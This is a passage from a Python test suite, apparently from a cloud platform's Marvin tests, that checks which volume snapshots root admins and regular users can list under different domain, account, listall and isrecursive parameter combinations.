self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_rec_false(self):
"""
        Test listing of Snapshots by passing domainid and isrecursive="false" parameters as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as ROOT Admin passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## ROOT Admin - Test cases when account and domainId are passed with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_true(self):
"""
        Test listing of Snapshots by passing domainid, account and listall="true" parameters as admin
        Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true")
self.debug("List as ROOT Admin passing domainId and accountId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_true_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="true" and isrecursive="true" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as ROOT Admin passing domainId and accountId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_true_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="true" and isrecursive="false" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as ROOT Admin passing domainId and accountId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## ROOT Admin - Test cases when account and domainId are passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_false(self):
"""
        Test listing of Snapshots by passing domainid, account and listall="false" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false")
self.debug("List as ROOT Admin passing domainId and accountId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_false_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="false" and isrecursive="true" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as ROOT Admin passing domainId and accountId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_listall_false_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="false" and isrecursive="false" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as ROOT Admin passing domainId and accountId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## ROOT Admin - Test cases when account and domainId are passed without the listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid(self):
"""
        Test listing of Snapshots by passing domainid and account parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id)
self.debug("List as ROOT Admin passing domainId and accountId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, account and isrecursive="true" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as ROOT Admin passing domainId and accountId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_accountid_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, account and isrecursive="false" parameters as admin
Validate that it returns all the Snapshots of the account that is passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as ROOT Admin passing domainId and accountId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Regular User - Test cases with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_true(self):
"""
Test listing of Snapshots by passing listall="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true")
self.debug("List as Regular User - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_true_rec_true(self):
"""
        Test listing of Snapshots by passing listall="true" and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="true")
self.debug("List as Regular User - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_true_rec_false(self):
"""
        Test listing of Snapshots by passing listall="true" and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="false")
self.debug("List as Regular User - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_false(self):
"""
        Test listing of Snapshots by passing listall="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false")
self.debug("List as Regular User - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_false_rec_true(self):
"""
        Test listing of Snapshots by passing listall="false" and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="true")
self.debug("List as Regular User - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_listall_false_rec_false(self):
"""
        Test listing of Snapshots by passing listall="false" and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="false")
self.debug("List as Regular User - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Regular User - Test cases without passing listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser(self):
"""
Test listing of Snapshots by passing no parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient)
self.debug("List as Regular User %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_rec_true(self):
"""
        Test listing of Snapshots by passing isrecursive="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="true")
self.debug("List as Regular User - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_rec_false(self):
"""
        Test listing of Snapshots by passing isrecursive="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="false")
self.debug("List as Regular User passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Regular User - Test cases when domainId is passed with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_true(self):
"""
Test listing of Snapshots by passing domainid,listall="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="true")
self.debug("List as Regular User passing domainId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_true_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, listall="true" and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="true", isrecursive="true")
self.debug("List as Regular User passing domainId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_true_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, listall="true" and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="true", isrecursive="false")
self.debug("List as Regular User passing domainId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_false(self):
"""
Test listing of Snapshots by passing domainid,listall="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="false")
self.debug("List as Regular User passing domainId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_false_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, listall="false" and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="false", isrecursive="true")
self.debug("List as Regular User passing domainId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_listall_false_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, listall="false" and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, listall="false", isrecursive="false")
self.debug("List as Regular User passing domainId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Regular User - Test cases when domainId is passed with no listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid(self):
"""
Test listing of Snapshots by passing domainid parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id)
self.debug("List as Regular User passing domainId %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_true_rec_true(self):
"""
        Test listing of Snapshots by passing domainid and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, isrecursive="true")
self.debug("List as Regular User passing domainId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid__rec_false(self):
"""
        Test listing of Snapshots by passing domainid and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_1.id, isrecursive="false")
self.debug("List as Regular User passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Regular User - Test cases when account and domainId are passed with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_true(self):
"""
Test listing of Snapshots by passing domainid,account,listall="true" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="true")
self.debug("List as Regular User passing domainId and accountId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_true_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="true" and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="true", isrecursive="true")
self.debug("List as Regular User passing domainId and accountId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_true_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="true" and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="true", isrecursive="false")
self.debug("List as Regular User passing domainId and accountId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Regular User - Test cases when account and domainId are passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_false(self):
"""
Test listing of Snapshots by passing domainid,account,listall="false" parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="false")
self.debug("List as Regular User passing domainId and accountId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_false_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="false" and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="false", isrecursive="true")
self.debug("List as Regular User passing domainId and accountId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_listall_false_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, account, listall="false" and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, listall="false", isrecursive="false")
self.debug("List as Regular User passing domainId and accountId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Regular User - Test cases when account and domainId are passed without the listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid(self):
"""
Test listing of Snapshots by passing domainid,account parameter as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id)
self.debug("List as Regular User passing domainId and accountId %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, account and isrecursive="true" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, isrecursive="true")
self.debug("List as Regular User passing domainId and accountId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_regularuser_domainid_accountid_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, account and isrecursive="false" parameters as regular user
Validate that it returns all the Snapshots of the account the user belongs to
"""
self.apiclient.connection.apiKey = self.user_d1a_apikey
self.apiclient.connection.securityKey = self.user_d1a_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d1a.user[0].username, domainid=self.domain_1.id, isrecursive="false")
self.debug("List as Regular User passing domainId and accountId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Cross Domain access check
